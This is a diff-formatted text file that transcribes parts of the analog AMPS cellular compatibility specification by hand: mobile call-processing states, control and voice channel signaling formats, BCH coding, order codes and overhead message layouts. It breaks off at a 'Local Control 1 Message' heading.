+channel number is within the set designated for cellular systems.  A true
+answer requires adding this/these channel(s) to the CCLIST.
+
+
+        Awaiting Answers
+
+Here, an alert timer is set for 65 seconds (0 to +20 percent).  During this
+period the following events may take place:
+
+        o Should time expire, the mobile turns its transmitter off and enters
+          the Serving System Determination Task.
+        o An answer requires signaling tone turnoff and Conversation Task 
+          entry.
+
+        o If any of the messages listed hereafter are received within 100
+          milliseconds, the mobile must compare SCC digits that identify stored
+          and proper SAT frequencies for the station to the PSCC (present SAT
+          color code).  If not equivalent, the order is ignored.  If correct,
+          then the following actions taken for each order:
+
+        Handoff:  Signaling extinguished for 500 msec, signal tone off,
+        transmitter off, power lever adjusted, new channel tuned, new SAT, new
+        SCC field, transmitter on, fade timer reset, and signaling tone on.
+        Wait for an answer.
+
+          Alert:  Reset alert timer for 65 seconds and stay in
+                  Waiting for Answer Task.
+
+     Stop Alert:  Extinguish signaling tone and enter Waiting for Order Task.
+
+        Release:  Signaling tone off, wait 500 msec, then enter Release Task.
+
+          Audit:  Confirm message to land station, then stay in
+                  Waiting for Answer Task.
+
+    Maintenance:  Reset alert timer for 65 seconds and remain in
+                  Waiting for Answer Task.
+
+   Change Power:  Adjust transmitter to power level required and send
+                  confirmation to land station.  Remain in
+                  Waiting for Answer Task.
+
+  Local Control:  If local control is enabled and order received, examine LC
+                  field and determine action.
+
+                  Orders other than the above for this type of action are
+                  ignored.
+
+        Conversation
+
+In this mode, a release-delay timer is set for 500 mSec.  If Termination is
+enabled, the mobile sets termination status to disabled and waits 500 mSec
+before entering Release Task.  The following actions may then execute:
+
+        o  Upon call termination, the release delay timer has to be checked.
+           If time has expired, the Release Task is entered; if not expired,
+           the mobile must wait until expiration and then enter Release Task.
+
+        o  Upon user requested flash, signaling tone turned on for 400 mSec.
+           But should a valid order tone be received during this interval,
+           the flash is immediately terminated and the order processed.  The
+           flash, of course, is not then valid.
+
+        o  Upon receipt of the following listed orders and within 100 mSec,
+           the mobile must compare SCC with PSCC, and the order is ignored
+           if the two are not equal.  But if they are the same, the following
+           can occur:
+
+        Handoff:  Signaling tone on for 50 mSec, then off, transmitter off,
+        power level adjusted, new channel tuned, adjust new SAT, set SCC to SCC
+        field message value, transmitter on, fade timer reset, remain in
+        Conversation Task.
+
+    Send Called Address:  Upon receipt within 10 seconds of last valid flash,
+                  called address sent to land station.  Mobile remains in
+                  Conversation Task.  Otherwise, remain in Conversation Task.
+
+          Alert:  Turn on signaling tone, wait 500 mSec, then enter
+                  Waiting for Answer Task.
+
+        Release:  Check release delay timer.  If time expired, mobile enters
+                  Release Task; but if timer has not finished, then mobile must
+                  wait and then enter Release Task when time has expired.
+
+          Audit:  Order confirmation sent to land station while remaining in
+                  Conversation Task.
+
+    Maintenance:  Signaling tone on, wait 500 mSec, then enter Waiting for
+                  Answer Task.
+
+   Change Power:  Adjust transmitter to power level required by order
+                  qualification code and send confirmation to land station.
+                  Remain in Conversation Task.
+
+  Local Control:  If local control in enabled and local control order received,
+                  the LC field is to be checked for subsequent action and
+                  confirmation.
+
+Orders other than the above for this type of action are ignored.
+
+
+        Release
+
+In the release mode the following steps are required:
+
+        o  Signaling tone sent for 1.8 sec.  If flash in transmission when
+           signaling tone begun, it must be continued and timing bridged so
+           that action stops within 1.8 sec.
+        o  Stop signaling tone.
+                o  Turn off transmitter.
+                o  The mobile station then enters the Serving System
+                   Determination Task.
+
+The above is the Cellular System Mobile/Land Station Compatibility
+Specification.  The following shall be Signaling Formats which are also found
+in the above document.  I converted all these tables by HAND into ASCII so
+appreciate them.  It wasn't the easiest thing to do.  But I must say, I
+definitely understand the entire cellular operation format.
+
+
+   There are two types of continuous wideband data stream transmissions.  One
+is the Forward Control Channel which is sent from the land station to the
+mobile.  The other is the Reverse Control Channel, which is sent from the
+mobile to the land station.  Each data stream runs at a rate of 10 kilobit/sec,
++/- 1 bit/sec rate.  The formats for each of the channels follow.
+
+
+      - Forward Control Channel
+
+The forward control channel consists of three discrete information streams.
+They are called stream A, stream B and the busy-idle stream.  All three streams
+are multiplexed together.  Messages to mobile stations with the least
+significant bit of their MIN number equal to "0" are sent on stream A, and
+those with a "1" are sent on stream B.
+
+The busy-idle stream contains busy-idle bits, which are used to indicate the
+status of the reverse control channel.  If the busy-idle bit = "0" the reverse
+control channel is busy, if it equals "1" it is idle.  The busy-idle bit is
+located at the beginning of each dotting sequence, word sync sequence, at the
+beginning of the first repeat of word A and after every 10 message bits
+thereafter.
+
+Mobile stations achieve synchronization with the incoming data via a 10 bit
+dotting sequence (1010101010) and an 11 bit word sync sequence (11100010010).
+Each word contains 40 bits, including parity and is repeated 5 times after
+which it is then referred to as a "block".  For a multiword message, the second
+word block and subsequent word blocks are formed the same as the first word
+block including the dotting and sync sequences.  A "word" is formed when the 28
+content bits are encoded into a (40, 28; 5) BCH (Bose-Chaudhuri-Hocquenghem)
+code.  The left-most bit shall be designated the most-significant bit.
+
+        The Generator polynominal for the (40, 28;5) BCH code is:
+
+                        12    10    8    5    4    3    0
+              G (X) =  X   + X   + X  + X  + X  + X  + X
+               B
+
+Each FOCC message can consist of one or more words.  Messaging transmitted over
+the forward control channel are:
+
+                - Mobile station control message
+                - Overhead message
+                - Control-filler message
+
+Control-filler messages may be inserted between messages and between word
+blocks of a multiword message.
+
+Message Formats:  Found on either stream A or B
+
+     -  Mobile Station Control Message
+
+The mobile station control message can consist of one, two, or four words.
+
+        Word 1 (abbreviated address word)
+
+   +--------+-------+---------------------------------------+-----------+
+   | T   t  |       |                                       |           |
+   |  1   2 |  DCC  |    Mobile Identification Number 1     |     P     |
+   |        |       |                      23-0             |           |
+   +--------+-------+---------------------------------------+-----------+
+ bits:  2       2                      24                         12
+
+
+         Word 2 (Extended Address Word)
+
+
+     +------+-----+-----------+------+--------+-------+----------+-----+
+     | T  T |SCC =|           | RSVD | LOCAL  | CRDQ  |   ORDER  |     |
+     |  1  2| 11  |  MIN2     | = 0  |        |       |          |     |
+     |   =  +-----+     3-24  +------+-----+--+-------+----------|  P  |
+     |  10  |SCC =|           |    VMAC    |       CHAN          |     |
+     |      | 11  |           |            |                     |     |
+     +------+-----+-----------+------------+---------------------+-----+
+         2     2       10           3               11              12
+
+
+        Word 3 (First Directed-Retry Word)
+
+
+     +------+-----+-----------+-----------+-----------+-------+--------+
+     | T  T | SCC |           |           |           | RSVD  |        |
+     |  1  2|  =  |  CHANPOS  |  CHANPOS  |  CHANPOS  |  =    |        |
+     |   =  |     |           |           |           | 000   |    P   |
+     |  10  | 11  |           |           |           |       |        |
+     +------+-----+-----------+-----------+-----------+-------+--------+
+        2      2        7           7           7         3       12
+
+
+        Word 4 (Second Directed-Retry Word)
+
+     +------+-----+-----------+-----------+-----------+-------+--------+
+     | T  T | SCC |           |           |           | RSVD  |        |
+     |  1  2|  =  |  CHANPOS  |  CHANPOS  |  CHANPOS  |  =    |        |
+     |   =  |     |           |           |           | 000   |    P   |
+     |  10  | 11  |           |           |           |       |        |
+     +------+-----+-----------+-----------+-----------+-------+--------+
+        2      2        7           7           7         3        12
+
+
+The interpretation of the data fields:
+
+        T  T   - Type field.  If only Word 1 is send, set to 00 in Word 1.
+        SCC    - SAT color code (discussed previously)
+        ORDER  - Order field.  Identifies the order type (see table below)
+        ORDQ   - Order qualifier field.  Qualifies the order to a specific
+                 action
+        LOCAL  - Local control field.  This field is specific to each system.
+                 The ORDER field must be set to local control for this field to
+                 be interpreted.
+        VMAC   - Voice Mobile Attenuation Code field.  Indicates the mobile
+                 station power level associated with the designated voice
+                 channel.
+        CHAN   - Channel number field.  Indicates the designated voice channel.
+        CHANPOS- CHANnel POSition field.  Indicates the position of a control
+                 channel relative to the first access channel (FIRSTCHA).
+        RSVD   - Reserved for future use, all bits must be set as indicated.
+        P      - Parity field.
+
+
+        Coded Digital Color Code
+      +--------------------------------------------+
+      | Received DCC           7-bit Coded DCC     |
+      |     00                     0000000         |
+      |     01                     0011111         |
+      |     10                     1100011         |
+      |     11                     1111100         |
+      +--------------------------------------------+
+
+
+        Order and Order Qualification Codes
+
+  +-------+-------------+---------------------------------------------------+
+  | Order |    Order    |                                                   |
+  | Code  |Qualification|                     Function                      |
+  |       |    Code     |                                                   |
+  +-------+-----------------------------------------------------------------+
+  | 00000      000      page (or origination)                               |
+  | 00001      000      alert                                               |
+  | 00011      000      release                                             |
+  | 00100      000      reorder                                             |
+  | 00110      000      stop alert                                          |
+  | 00111      000      audit                                               |
+  | 01000      000      send called-address                                 |
+  | 01001      000      intercept                                           |
+  | 01010      000      maintenance                                         |
+  |                                                                         |
+  | 01011      000      charge power to power level 0                       |
+  | 01011      001      charge power to power level 1                       |
+  | 01011      010      charge power to power level 2                       |
+  | 01011      011      charge power to power level 3                       |
+  | 01011      100      charge power to power level 4                       |
+  | 01011      101      charge power to power level 5                       |
+  | 01011      110      charge power to power level 6                       |
+  | 01011      111      charge power to power level 7                       |
+  |                                                                         |
+  | 01100      000      directed retry - not last try                       |
+  | 01100      001      directed retry - last try                           |
+  |                                                                         |
+  | 01101      000      non-autonomous registration - don't reveal location |
+  | 01101      001      non-autonomous registration - make location known   |
+  | 01101      010      autonomous registration - don't reveal location     |
+  | 01101      011      autonomous registration - make location known       |
+  |                                                                         |
+  | 11110      000      local control                                       |
+  |                                                                         |
+  |      All other codes are reserved                                       |
+  |                                                                         |
+  +-------------------------------------------------------------------------+
+
+
+        Forward Voice Channel
+
+The forward voice channel (FVC) is a wideband data stream sent by the land
+station to the mobile station.  This data stream must be generated at a 10
+kilobit/Sec +/- .1 bit/Sec rate.  The Forward Voice Channel format follows:
+
+  +-----------+------+--------+-----+------+--------+-----+------+------
+ ||           |      | Repeat |     |      | Repeat |     |      |
+ ||           | word |        |     | word |        |     | word |
+ ||  Dotting  | sync |  1 of  | dot | sync |  2 of  | dot | sync |
+ ||           |      |        |     |      |        |     |      |
+ ||           |      |  Word  |     |      |  Word  |     |      |
+  +-----------+------+--------+-----+------+--------+-----+------+------
+      101        11      40      37    11      40      37    11
+
+       -----+--------+-----+------+--------+-----+------+--------+
+            | Repeat |     |      | Repeat |     |      | Repeat ||
+            |        |     | word |        |     | word |        ||
+            |  9 of  | dot | sync | 10 of  | dot | sync | 11 of  ||
+            |        |     |      |        |     |      |        ||
+            |  Word  |     |      |  Word  |     |      |  Word  ||
+       -----+--------+-----+------+--------+-----+------+--------+
+                40      37    11      40      37    11      40
+
+A 37-bit dotting sequence and an 11-bit word sync sequence are sent to permit
+mobile stations to achieve synchronization with the incoming data, except at
+the first repeat of the word, where the 101-bit dotting sequence is used.  Each
+word contains 40 bits, including parity, and is repeated eleven times together
+with the 37-bit dotting and 11-bit word sync; it is then referred to as a word
+block.  A word block is formed by encoded the 28 content bits into a (40, 28)
+BCH code that has a distance of 5 (40, 28; 5).  The left-most bit (as always)
+is designated the most-significant bit.  The 28 most significant bits of the
+40-bit field shall be the content bits.  The generator polynominal is the same
+as that used for the forward control channel.
+
+The mobile station control message is the only message transmitted over the
+forward voice channel.  The mobile station control message consists of one
+word.
+
+
+        Mobile Station Control Message:
+
+      +-------+-------+------+-----------+-------+------+-------+------+
+      | T  T  | SCC = |      |  RSVD =   | LOCAL | ORDQ | ORDER |      |
+      |  1  2 |   11  |      | 000 ... 0 |       |      |       |      |
+      |   =   +-------| PSCC +-----------+-------+------+-------+   P  |
+      |       | SCC = |      |  RSVD =   |  VMAC |    CHANNEL   |      |
+      |  10   |   11  |      | 000 ... 0 |       |              |      |
+      +-------+-------+------+-----------+-------+--------------+------+
+          2       2       2        8         3          11         12
+
+      Interpretation of the data fields:
+
+        T  T   - Type field.  Set to '10'.
+         1  2
+
+       SCC     - SAT color code for new channel (see SCC table)
+       PSCC    - Present SAT color code.  Indicates the SAT color code
+                 associated with the present channel.
+       ORDER   - Order field.  Identifies the order type.  (see Order table)
+       ORDQ    - Order qualifier field.  Qualifies the order to a specific
+                 action (see Order table)
+       LOCAL   - Local Control field.  This field is specific to each system.
+                 The ORDER field must be set to local control (see Order table)
+                 for this field to be interpreted.
+       VMAC    - Voice mobile attenuation code field.  Indicates the mobile
+                 station power level associated with the designated voice
+                 channel.
+       RSVD    - Reserved for future use;  all bits must be set as indicated.
+       P       - Parity field.
+
+
+        Reverse Control Channel
+
+The Reverse Control Channel (RECC) is a wideband data stream sent from the
+mobile station to the land station.  This data stream runs at a rate of 10
+kilobit/sec, +/- 1 bit/sec rate.  The format of the RECC data stream follows:
+
+     +---------+------+-------+------------+-------------+-----------+-----
+     | Dotting | Word | Coded | first word | Second word | Third word|
+     |         | sync |  DCC  | repeated   |   repeated  |  repeated |
+     |         |      |       | 5 times    |   5 times   |  5 times  |
+     +---------+------+-------+------------+-------------+-----------+-----
+  bits:  30       11      7        240           240          240
+
+                         Dotting = 01010101...010101
+
+                       Word sync = 11100010010
+
+
+All messages begin with the RECC seizure precursor with is composed of a 30 bit
+dotting sequence (1010...101), and 11 bit word sync sequence (11100010010), and
+the coded digital color code.
+
+Each word contains 48 bits, including parity, and is repeated five times after
+which it is referred to as a word block.  A word is formed by encoding 36
+content bits into a (48, 36) BCH code that has a distance of 5, (48 36; 5).
+The left most bit shall be designated the most-significant bit.  The 36 most
+significant bits of the 48 bit field shall be the content bits.
+
+The generator polynomial for the code is the same for the (40,28;5) code used
+on the forward channel.
+
+Each Reverse Control Channel message can consist of one of the five words.  The
+types of messages to be transmitted over the reverse control channel are as
+follows:
+
+        o  Page Response Message
+        o  Origination Message
+        o  Order Confirmation Message
+        o  Order Message
+
+These messages are made up of combination of the following five words:
+
+        Word A - Abbreviated Address Word
+
+   +---+------+---+---+---+------+---+-----------------------------------+---+
+   | F |      |   |   |   | RSVD | S |                                   |   |
+   |   |      |   |   |   |      |   |                                   |   |
+   | = | NAWC | T | S | E |  =   | C |          MIN 1                    | P |
+   |   |      |   |   |   |      |   |                23 - 0             |   |
+   | 1 |      |   |   |   |  0   | M |                                   |   |
+   +---+------+---+---+---+------+---+-----------------------------------+---+
+     1     3    1   1   1    1     4                   24                  12
+
+
+        Word B - Extended Address Word
+
+   +---+------+-------+------+-------+----+------+-----------------------+---+
+   | F |      |       |      |       |    | RSVD |                       |   |
+   |   |      |       |      |       |    |      |                       |   |
+   | = | NAWC | LOCAL | ORDQ | LOCAL | LT |  =   |      MIN 2            | P |
+   |   |      |       |      |       |    |      |            33-24      |   |
+   | 0 |      |       |      |       |    | 00..0|                       |   |
+   +---+------+-------+------+-------+----+------+-----------------------+---+
+     1    3       5      3       5     1      8              10            12
+
+
+        Word C - Electronic Serial Number Word
+
+   +---+--------+--------------------------------------+---------------+
+   | F |        |                                      |               |
+   |   |        |                                      |               |
+   | = |  NAWC  |             SERIAL (ESN)             |       P       |
+   |   |        |                                      |               |
+   | 1 |        |                                      |               |
+   +---+--------+--------------------------------------+---------------+
+     1     3                      32                           12
+
+
+        Word D - First Word of the Called-Address
+
+    +---+------+-------+-------+-----+-----+-----+-----+-------+-------+---+
+    | F |      | 1st   | 2nd   |     |     |     |     | 7th   | 8th   |   |
+    |   |      |       |       |     |     |     |     |       |       |   |
+    | = | NAWC | DIGIT | DIGIT | ... | ... | ... | ... | DIGIT | DIGIT | P |
+    |   |      |       |       |     |     |     |     |       |       |   |
+    | 1 |      |       |       |     |     |     |     |       |       |   |
+    +---+------+-------+-------+-----+-----+-----+-----+-------+-------+---+
+      1    3       4       4      4     4     4     4      4       4     12
+
+
+        Word E - Second Word of the Called-Address
+
+    +---+------+-------+-------+-----+-----+-----+-----+-------+-------+---+
+    | F | NAWC | 9th   | 10th  |     |     |     |     | 15th  | 16th  |   |
+    |   |      |       |       |     |     |     |     |       |       |   |
+    | = |  =   | DIGIT | DIGIT | ... | ... | ... | ... | DIGIT | DIGIT | P |
+    |   |      |       |       |     |     |     |     |       |       |   |
+    | 0 | 000  |       |       |     |     |     |     |       |       |   |
+    +---+------+-------+-------+-----+-----+-----+-----+-------+-------+---+
+      1    3       4       4      4     4     4     4      4       4     12
+
+
+The interpretation of the data fields is as follows:
+
+        F      - First word indication field.  Set to '1' in first word and '0'
+                 in subsequent words.
+
+        NAWC   - Number of additional words coming field.
+        T      - T field.  Set to '1' to identify the message as an origination
+                 or an order; set to '0' to identify the message as an order
+                 response or page response.
+        S      - Send serial number word.  If the serial number word is sent,
+                 set to '1';  if the serial number word is not sent, set to
+                 '0'.
+        SCM    - The station class mark field
+        ORDER  - Order field.  Identifies the order type.
+        ORDQ   - Order qualifier field.  Qualifies the order confirmation to a
+                 specific action.
+        LOCAL  - Local control field.  This field is specific to each system.
+                 The ORDER field must be set to locate control for this field
+                 to be interpreted.
+        LT     - Last-try code field.
+        MIN1   - Mobile Identification number field part one.
+        MIN2   - Mobile Identification number field part two.
+        SERIAL - Electronic Serial Number field.  Identifies the serial number
+                 of the mobile station.
+        DIGIT  - Digit field (see table below)
+        RSVD   - Reserved for future use; all bits must be set as indicated.
+        P      - Parity field.
+
+
+        Called-address Digit Codes
+   +------------------------------------------------------------------------+
+   |    Digit           Code            Digit           Code                |
+   |                                                                        |
+   |      1             0001              7             0111                |
+   |      2             0010              8             1000                |
+   |      3             0011              9             1001                |
+   |      4             0100              0             1010                |
+   |      5             0101              *             1011                |
+   |      6             0110              #             1100                |
+   |                                    Null            0000                |
+   |                                                                        |
+   |    NOTE:                                                               |
+   |    1.  The digit 0 is encoded as binary 10, not binary zero.           |
+   |    2.  The code 0000 is the null code, indicated no digit present      |
+   |    3.  All other four-bit sequences are reserved, and must not be      |
+   |        transmitted.                                                    |
+   |                                                                        |
+   +------------------------------------------------------------------------+
+
+Examples of encoding called-address information into the called address words
+follow:
+
+If the number 2# is entered, the word is as follows:
+
+   +------+------+------+------+------+------+------+------+------+---------+
+   | NOTE | 0010 | 1100 | 0000 | 0000 | 0000 | 0000 | 0000 | 0000 |    P    |
+   +------+------+------+------+------+------+------+------+------+---------+
+
+If the number 13792640 is entered, the word is as follows:
+
+   +------+------+------+------+------+------+------+------+------+---------+
+   | NOTE | 0001 | 0011 | 0111 | 1001 | 0010 | 0110 | 0100 | 1010 |    P    |
+   +------+------+------+------+------+------+------+------+------+---------+
+
+As you can see the numbers are coded into four bits and inserted sequentially
+into the train.  Notice that when the number is longer than 8 numbers it is
+broken into two different Words.
+
+If the number 6178680300 is entered, the words are as follows:
+
+        Word D - First Word of the Called-Address
+
+   +------+------+------+------+------+------+------+------+------+---------+
+   | NOTE | 0110 | 0001 | 0111 | 1000 | 0110 | 1000 | 1010 | 1010 |    P    |
+   +------+------+------+------+------+------+------+------+------+---------+
+       4      4      4      4      4      4      4      4     4        12
+
+        Word E - Second Word of the Called-Address
+
+   +------+------+------+------+------+------+------+------+------+---------+
+   | NOTE | 0010 | 1010 | 1010 | 0000 | 0000 | 0000 | 0000 | 0000 |    P    |
+   +------+------+------+------+------+------+------+------+------+---------+
+       4      4      4      4      4      4      4      4     4        12
+
+       NOTE = four bits which depend on the type of message
+
+
+        Reverse Voice Channel
+
+The reverse voice channel (RVC) is a wideband data stream sent from the mobile
+station to the land station.  This data stream must be generated at a 10
+kilobit/second +/- 1 bit/sec rate.  The format is presented below.
+
+  +-------------+------+----------+-----+------+----------+-----+------+----
+ ||             |      | Repeat 1 |     |      | Repeat 2 |     |      |
+ ||             | word |          |     | word |          |     | word |
+ ||   Dotting   | sync |    of    | Dot | sync |    of    | Dot | sync |
+ ||             |      |          |     |      |          |     |      |
+ ||             |      |  Word 1  |     |      |  Word 1  |     |      |
+  +-------------+------+----------+-----+------+----------+-----+------+----
+      101         11       48      37     11       48       37    11
+
+ ---+----------+-----+------+----------+-----+------+----------+-----+----
+    | Repeat 3 |     |      | Repeat 4 |     |      | Repeat 5 |     |
+    |          |     | word |          |     | word |          |     |
+    |    of    | Dot | sync |    of    | Dot | sync |    of    | Dot |
+    |          |     |      |          |     |      |          |     |
+    |  Word 1  |     |      |  Word 1  |     |      |  Word 1  |     |
+ ---+----------+-----+------+----------+-----+------+----------+-----+----
+        48       37     11      48        37    11       48       37
+
+        ---+------+----------+--------    -------+----------+
+           |      | Repeat 1 |                   | Repeat 5 ||
+           | word |          |                   |          ||
+           | sync |    of    |   ...             |    of    ||
+           |      |          |                   |          ||
+           |      |  Word 2  |                   |  Word 2  ||
+        ---+------+----------+--------    -------+----------+
+
+A 37-bit dotting sequence and an 11-bit word sync sequence are sent to permit
+land stations to achieve synchronization with the incoming data, except at the
+first repeat of word 1, where a 101-bit dotting sequence is used.  Each word
+contains 48 bits, including parity, and is repeated five times together with
+the 37-bit dotting and 11-bit word sync sequences; it is then referred to as a
+word block.  For a multi-word message, the second word block is formed the same
+as the first word block including the 37-bit dotting and 11-bit word sync
+sequences.  A word is formed by encoding the 36 content bits into a (48, 36)
+BCH code that has a distance of 5, (48, 36; 5).  The left-most bit (earliest in
+time) shall be designated the most-significant bit.  The 36 most-significant
+bits of the 48-bit field shall be the content bits.  The generator polynomial
+for the code is the same as for the (40, 28; 5) code used on the forward
+control channel.
+
+Each RVC message can consist of one or two words.  The types of messages to be
+transmitted over the reverse voice channel are as follows:
+
+        o Order Confirmation Message
+        o Called-Address Message
+
+The message formats are as follows:
+
+
+        Order Confirmation Message:
+
+     +---+------+---+-------+------+-------+-----------+---------+
+     | F | NAWC | T |       |      |       |    RSVD   |         |
+     |   |      |   |       |      |       |           |         |
+     | = |  =   | = | LOCAL | ORDQ | ORDER |     =     |    P    |
+     |   |      |   |       |      |       |           |         |
+     | 1 |  00  | 1 |       |      |       | 000 ... 0 |         |
+     +---+------+---+-------+------+-------+-----------+---------+
+       1    2     1     5       3      5        19         12
+
+
+        Called-Address Message
+
+        Word 1 - First Word of the Called-Address
+
+  +---+------+---+-------+-------+-----+-----+-----+-----+-------+-------+---+
+  | F | NAWC | T |       |       |     |     |     |     |       |       |   |
+  |   |      |   |  1st  |  2nd  |     |     |     |     |  7th  |  8th  |   |
+  | = |  =   | = | Digit | Digit | ... | ... | ... | ... | Digit | Digit | P |
+  |   |      |   |       |       |     |     |     |     |       |       |   |
+  | 1 |  01  | 0 |       |       |     |     |     |     |       |       |   |
+  +---+------+---+-------+-------+-----+-----+-----+-----+-------+-------+---+
+    1    2     1     4       4      4     4     4     4      4       4     12
+
+        Word 2 - Second Word of the Called-Address
+
+  +---+------+---+-------+-------+-----+-----+-----+-----+-------+-------+---+
+  | F | NAWC | T |       |       |     |     |     |     |       |       |   |
+  |   |      |   |  9th  |  10th |     |     |     |     |  15th |  16th |   |
+  | = |  =   | = | Digit | Digit | ... | ... | ... |  .. | Digit | Digit | P |
+  |   |      |   |       |       |     |     |     |     |       |       |   |
+  | 0 |  00  | 0D|       |       |     |     |     |     |       |       |   |
+  +---+------+---+-------+-------+-----+-----+-----+-----+-------+-------+---+
+    1    2     1     4       4      4     4     4     4      4       4     12
+
+
+The fields are descriptions a the me as those for the Reverse Control channel
+above.
+
+        Overhead Message
+
+A three-bit OHD field is used to identify the overhead message types.  Overhead
+message type codes are listed in the table below.  They are grouped into the
+following functional classes:
+
+        o System parameter overhead message
+        o Global action overhead message
+        o Registration identification message
+        o Control-filler message
+
+Overhead messages are send in a group called an overhead message train.  The
+first message of the train must be the system parameter overhead message.  The
+desired global action messages and/or a registration ID message must be
+appended to the end of the system parameter overhead message.  The total number
+of words in an overhead message train is one more than the value of the NAWC
+field contained in the first word of the system parameter overhead message.
+The last word in the train must be set to '0'.  For NAWC-counting purposes,
+inserted control-filler messages must not be counted as part of the overhead
+message train.
+
+The system parameter overhead message must be sent every .8 +/- .3 seconds on
+each of the following control channels:
+
+        o combined paging-access forward channel.
+        o Separate paging forward control channel
+        o Separated access forward control channel when the control-filler
+          message is sent with the WFOM bit set to '1'.
+
+The global action messages and the registration identification message are sent
+on an as needed basis.
+
+        o The system parameter for overhead message consists of two words.
+
+
+    0  Word 1
+
+        +-------+-----+----------+------+------+-----+------------+
+        | T  T  |     |          | RSVD |      | OHD |            |
+        |  1  2 |     |          |      |      |     |            |
+        |   =   | DCC |   SID1   |  =   | NAWC |  =  |     P      |
+        |       |     |          |      |      |     |            |
+        |  11   |     |          | 000  |      | 110 |            |
+        +-------+-----+----------+------+------+-----+------------+
+            2      2       14        3      4     3        12
+
+
+        Word 2
+
+       +-------+-------+-----+-----+------+------+-----+------+---
+       | T  T  |       |     |     |      |      |     | RSVD |
+       |  1  2 |       |     |     |      |      |     |      |
+       |   =   |  DCC  |  S  |  E  | REGH | REGR | DTX |  =   |
+       |       |       |     |     |      |      |     |      |
+       |   11  |       |     |     |      |      |     |  0   |
+       +-------+-------+-----+-----+------+------+-----+------+---
+           2       2      1     1     1       1     1      1
+
+       ---+-------+-----+-----+----------+-----+-------+-----------+
+          |       |     |     |          |     |  OHD  |           |
+          |       |     |     |          |     |       |           |
+          | N - 1 | RCF | CPA | CMAX - 1 | END |   =   |     P     |
+          |       |     |     |          |     |       |           |
+          |       |     |     |          |     |  111  |           |
+       ---+-------+-----+-----+----------+-----+-------+-----------+
+              5      1     1        7       1      3         12
+
+
+                Overhead Message Types
+    +----------------------------------------------------------+
+    |   Code    Order                                          |
+    +----------------------------------------------------------+
+    |   000     Registration ID                                |
+    |   001     Control-filler                                 |
+    |   010     reserved                                       |
+    |   011     reserved                                       |
+    |   100     global action                                  |
+    |   101     reserved                                       |
+    |   110     Word 1 of system parameter message             |
+    |   111     Word 2 of system parameter message             |
+    +----------------------------------------------------------+
+
+        The interpretation of the data fields:
+
+        T  T    - Type field. Set to '11' indicating an overhead word.
+         1  2
+        OHD     - Overhead message type field.  The OHD field of Word 1 is set
+                  to '110' indicating the first word of the system parameter
+                  overhead message.  The OHD field of Word 2 is set to '111'
+                  indicating the second word of the system parameter overhead
+                  message.
+        DCC     - Digital Color Code field.
+        SID1    - First part of the system identification field
+        NAWC    - Number of Additional Words Coming field.  In Word 1 this
+                  field is set to one fewer than the total number of words in
+                  the overhead message train.
+        S       - Serial number field.
+        E       - Extended address field.
+        REGH    - Registration field for home stations.
+        REGR    - Registration field for roaming stations.
+        DTX     - Discontinuous transmission field.
+        N-1     - N is the number of paging channels in the system.
+        RCF     - Read-control-filler field.
+        CPA     - Combined paging/access field
+        CMAX-1  - CMAX is the number of access channels in the system.
+        END     - End indication field.  Set to '1' to indicate the last word
+                  and '0' if not the last word.
+        RSVD    - Reserved for future use, all bit must be set as indicated.
+        P       - Parity field.
+
+Each global action overhead message consists of one word.  Any number of global
+action messages can be appended to a system parameter overhead message.
+
+Here are the global action command formats:
+
+
+    Rescan Global Action Message
+
+    +-------{-------+------+---------------+-------+-------+-------------+
+    | T  T  |       |  ACT |    RSVD =     |       |  OHD  |             |
+    |  1  2 |       |      |               |       |       |             |
+    |   =   |  DCC  |   =  |               |  END  |   =   |      P      |
+    |       |       |      |   000 ... 0   |       |       |             |
+    |  11   |       | 0001 |               |       |  100  |             |
+    +-------+-------+------+---------------+-------+-------+-------------+
+        2       2       4          16          1       3          12
+
+    Registration Increment Global Action Message
+
+    +-------+-----+------+---------+--------+-------+-------+------------+
+    | T  T  |     |  ACT |         |        |       |  OHD  |            |
+    |  1  2 |     |      |         | RSVD = |       |       |            |
+    |   =   | DCC |   =  | REGINCR |        |  END  |   =   |      P     |
+    |       |     |      |         |  0000  |       |       |            |
+    |  11   |     | 0010 |         |        |       |  100  |            |
+    +-------+-----+------+---------+--------+-------+-------+------------+
+        2      2     4       12        4        1       3         12
+
+    New Access Channel Set Global Action Message
+
+    +-------+-------+-------+--------+----------+-------+-------+----------+
+    | T  T  |       |  ACT  |        |          |       |  OHD  |          |
+    |  1  2 |       |       |        |  RSVD =  |       |       |          |
+    |   =   |  DCC  |   =   | NEWACC |          |  END  |   =   |     P    |
+    |       |       |       |        |  00000   |       |       |          |
+    |   11  |       | 0110  |        |          |       |  100  |          |
+    +-------+-------+-------+--------+----------+-------+-------+----------+
+        2       2       4       11         5        1       3        12
+
+
+    Overload Control Global Action Message
+
+    +-------+-----+-------+---+---+---+--   --+---+---+---+-----+-----+------+
+    | T  T  |     |  ACT  | O | O | O |       | O | O | O |     | OHD |      |
+    |  1  2 |     |       | L | L | L |       | L | L | L |     |     |      |
+    |   =   | DCC |   =   | C | C | C |  ...  | C | C | C | END |  =  |   P  |
+    |       |     |       |   |   |   |       |   |   |   |     |     |      |
+    |   11  |     |  0110 | 0 | 1 | 2 |       | 13| 14| 15|     | 100 |      |
+    +-------+-----+-------+---+---+---+--   --+---+---+---+-----+-----+------+
+        2      2      4     1   1   1           1   1   1    1     3     12
+
+
+    Access Type Parameters Global Action Message
+
+    +-------+-----+------+-------+-----------+-------+-------+-----------+
+    | T  T  |     | ACT  |       |           |       |  OHD  |           |
+    |  1  2 |     |      |       |   RSVD =  |       |       |           |
+    |   =   | DCC |  =   |  BIS  |           |  END  |   =   |     P     |
+    |       |     |      |       | 0 ... 000 |       |       |           |
+    |  11   |     | 1001 |       |           |       |  100  |           |
+    +-------+-----+------+-------+-----------+-------+-------+-----------+
+        2      2      4      1        15         1       3         12
+
+
+    Access Attempt Parameters Global Action Message
+
+     +-------+-------+---------+-----------+-----------+-----------+---
+     | T  T  |       |   ACT   |           |           |           |
+     |  1  2 |       |         |  MAXBUSY  |  MAXSZTR  |  MAXBUSY  |
+     |   =   |  DCC  |    =    |           |           |           |
+     |       |       |         |   - PGR   |   - PGR   |  - OTHER  |
+     |  11   |       |   1010  |           |           |           |
+     +-------+-------+---------+-----------+-----------+-----------+---
+         2       2        4           4           4           4
+
+     ------+-----------+-------+-------+-----------+
+           |           |       |  OHD  |           |
+           |  MAXSZTR  |       |       |           |
+           |           |  END  |   =   |     P     |
+           |  - OTHER  |       |       |           |
+           |           |       |  100  |           |
+     ------+-----------+-------+-------+-----------+
+                 4         1       3         12
+
+
+     Local Control 1 Message
+
